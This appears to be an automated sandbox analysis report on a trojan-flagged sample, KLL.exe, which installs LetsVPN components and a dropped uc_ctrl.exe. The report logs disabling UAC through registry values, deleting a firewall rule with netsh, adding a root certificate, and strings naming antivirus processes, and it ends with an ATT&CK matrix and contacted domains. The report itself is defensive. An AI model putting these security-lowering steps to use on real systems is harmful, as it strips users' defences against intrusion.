Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Utils.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\log4net.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Source: C:\Users\user\Desktop\KLL.exe

Code function: 0_2_00007FF79676B018 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00007FF79676B018

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe

Code function: 19_2_6CB36E75 __EH_prolog3_GS,GetVersionExW,_wcschr,CoInitializeEx,CoCreateInstance,

19_2_6CB36E75

Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Disable UAC(promptonsecuredesktop)

Source: C:\Windows\System32\reg.exe

Registry value created: PromptOnSecureDesktop 0

Jump to behavior

Disables UAC (registry)

Source: C:\Windows\System32\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Modifies the windows firewall

Source: C:\ProgramData\letsvpn-latest.exe

Process created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets

Uses netsh to modify the Windows network and firewall settings

Source: C:\Users\user\Desktop\KLL.exe

Process created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" -f C:\ProgramData\24g5n.xml

Source: uc_ctrl.exe, 00000013.00000002.4034311008.000000000307B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: uc_ctrl.exe, 00000013.00000002.4034311008.000000000307B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: rtvscan.exe
Source: uc_ctrl.exe, 00000013.00000002.4034311008.000000000307B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: 360tray.exe
Source: uc_ctrl.exe, 00000013.00000002.4034311008.000000000307B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: a2guard.exe
Source: uc_ctrl.exe, 00000013.00000002.4034311008.000000000307B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: RavMonD.exe

Source: C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Blob

Stealing of Sensitive Information

Modifies the DNS server

Source: C:\Windows\System32\svchost.exe

Registry value created:

Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB12940 ?RemoveBindTabIndex@COptionUI@UiLib@@QAEXXZ,MessageBoxA,	19_2_6CB12940
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB070E0 ?BindTabIndex@COptionUI@UiLib@@QAEXH@Z,MessageBoxA,	19_2_6CB070E0
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB07120 ?BindTriggerTabSel@COptionUI@UiLib@@QAEXH@Z,MessageBoxA,	19_2_6CB07120
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB07100 ?BindTabLayoutName@COptionUI@UiLib@@QAEXPB_W@Z,MessageBoxA,	19_2_6CB07100
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB07140 ?BindUnionButton@CButtonUI@UiLib@@QAEXPAV12@_N1@Z,MessageBoxA,	19_2_6CB07140
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB08200 ?Download@CWebBrowserUI@UiLib@@UAGJPAUIMoniker@@PAUIBindCtx@@KJPAU_tagBINDINFO@@PB_W3I@Z,MessageBoxA,	19_2_6CB08200
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB09420 ?GetBindTabLayoutIndex@COptionUI@UiLib@@QAEHXZ,MessageBoxA,	19_2_6CB09420
Source: C:\ProgramData\SQBg9\KQ3ts~m8\uc_ctrl.exe	Code function: 19_2_6CB09440 ?GetBindTabLayoutName@COptionUI@UiLib@@QAE?AV?$CStringT@_WV?$StrTraitATL@_WV?$ChTraitsCRT@_W@ATL@@@ATL@@@ATL@@XZ,MessageBoxA,	19_2_6CB09440

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Replication Through Removable Media	331 Windows Management Instrumentation	1 Scripting	1 LSASS Driver	311 Disable or Modify Tools	31 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Native API	1 LSASS Driver	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	11 Peripheral Device Discovery	Remote Desktop Protocol	31 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	12 Command and Scripting Interpreter	1 DLL Side-Loading	1 Bypass User Account Control	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	2 Clipboard Data	11 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	3 Windows Service	1 Access Token Manipulation	1 Software Packing	NTDS	168 System Information Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	11 Registry Run Keys / Startup Folder	3 Windows Service	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	1 DLL Side-Loading	Cached Domain Credentials	371 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Registry Run Keys / Startup Folder	1 Bypass User Account Control	DCSync	261 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	42 Masquerading	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	2 Modify Registry	Network Sniffing	2 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	261 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Access Token Manipulation	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	12 Process Injection	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
KLL.exe	32%	ReversingLabs	Win32.Trojan.Generic
KLL.exe	32%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\letsvpn\LetsPRO.exe	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\Update.exe	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\CommunityToolkit.Mvvm.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.MsDelta.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.PatchApi.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\DeltaCompressionDotNet.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\FontAwesome.WPF.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Hardcodet.Wpf.TaskbarNotification.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\ICSharpCode.AvalonEdit.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\LetsPRO.exe	3%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNDomainModel.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\LetsVPNInfraStructure.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\MdXaml.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Analytics.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.Crashes.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.AppCenter.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Bcl.AsyncInterfaces.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Expression.Interactions.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.WinForms.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Web.WebView2.Wpf.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Primitives.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.AccessControl.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.Registry.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Microsoft.Win32.SystemEvents.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Mdb.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Pdb.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.Rocks.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Mono.Cecil.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Newtonsoft.Json.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\NuGet.Squirrel.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\PusherClient.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLite-net.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensions.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLiteNetExtensionsAsync.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.batteries_v2.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.core.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.nativelibrary.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SQLitePCLRaw.provider.dynamic_cdecl.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SharpCompress.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\Squirrel.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\SuperSocket.Clientuser.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.AppContext.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Buffers.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.CodeDom.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Concurrent.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.NonGeneric.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.Specialized.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Collections.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Annotations.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.EventBasedAsync.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.Primitives.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.TypeConverter.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.ComponentModel.dll	0%	ReversingLabs
C:\Program Files (x86)\letsvpn\app-3.7.0\System.Configuration.ConfigurationManager.dll	0%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
nal.fqoqehwib.com	0%	Virustotal	Browse
www.wshifen.com	0%	Virustotal	Browse
d1dmgcawtbm6l9.cloudfront.net	0%	Virustotal	Browse
socket-ap1-ingress-1471706552.ap-southeast-1.elb.amazonaws.com	0%	Virustotal	Browse
chr.alipayassets.com	0%	Virustotal	Browse
in.appcenter.ms	0%	Virustotal	Browse
yandex.com	0%	Virustotal	Browse
nit.crash1ytics.com	0%	Virustotal	Browse
www.baidu.com	1%	Virustotal	Browse
www.google.com	0%	Virustotal	Browse
ws-ap1.pusher.com	0%	Virustotal	Browse
www.yandex.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crl.microsoft	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.certum.pl/CPS0	0%	URL Reputation	safe
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://repository.certum.pl/ctnca.cer09	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://schemas.xmlsoap.org/soap/encoding/	0%	URL Reputation	safe
http://crl.certum.pl/ctnca.crl0k	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://www.certum.pl/CPS0	0%	URL Reputation	safe
http://www.symauth.com/cps0(	0%	URL Reputation	safe
https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8	0%	Avira URL Cloud	safe
https://pngimg.com/uploads/light/light_PNG14440.png	0%	Avira URL Cloud	safe
http://crl.micro	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
https://aka.ms/toolkit/dotnet	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/collections/1628560-help-documents	0%	Avira URL Cloud	safe
http://www.symauth.com/rpa00	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B	0%	Avira URL Cloud	safe
https://aka.ms/toolkit/dotnet	0%	Virustotal		Browse
http://repository.certum.pl/cscasha2.cer0	0%	Virustotal		Browse
https://letsvpn.world/terms.html	0%	Virustotal		Browse
https://pngimg.com/uploads/light/light_PNG14440.png	0%	Virustotal		Browse
https://intercom.help/letsvpn-world/en/articles/2907649-%E9%80%9A%E8%BF%87%E7%94%B3%E8%BF%B0%E6%89%B	0%	Virustotal		Browse
https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8	0%	Virustotal		Browse
https://intercom.help/letsvpn-world/en/collections/1628560-help-documents	0%	Virustotal		Browse
https://0.0.0.0%2F0	0%	Avira URL Cloud	safe
http://repository.certum.pl/cscasha2.cer0	0%	Avira URL Cloud	safe
https://letsvpn.world/terms.html	0%	Avira URL Cloud	safe
https://postPost142.242.204.31	0%	Avira URL Cloud	safe
https://letsvpn.world/registerterm.html	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/-N	0%	Avira URL Cloud	safe
https://letsvpn.world/privacy.html	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctnca.cer0	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctnca.cer0	0%	Virustotal		Browse
http://www.hardcodet.net/taskbar	0%	Avira URL Cloud	safe
https://letsvpn.world/registerterm.html	0%	Virustotal		Browse
https://letsvpn.world/privacy.html	0%	Virustotal		Browse
https://d1dmgcawtbm6l9.cloudfront.net/rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/-N	0%	Virustotal		Browse
http://www.hardcodet.net/taskbar	0%	Virustotal		Browse
https://d1dmgcawtbm6l9.cloudfront.net/rest-apiinvalid	0%	Avira URL Cloud	safe
https://intercom.help/letsvpn-world/en/articles/2830420-special-settings-for-killer-networking-produ	0%	Virustotal		Browse
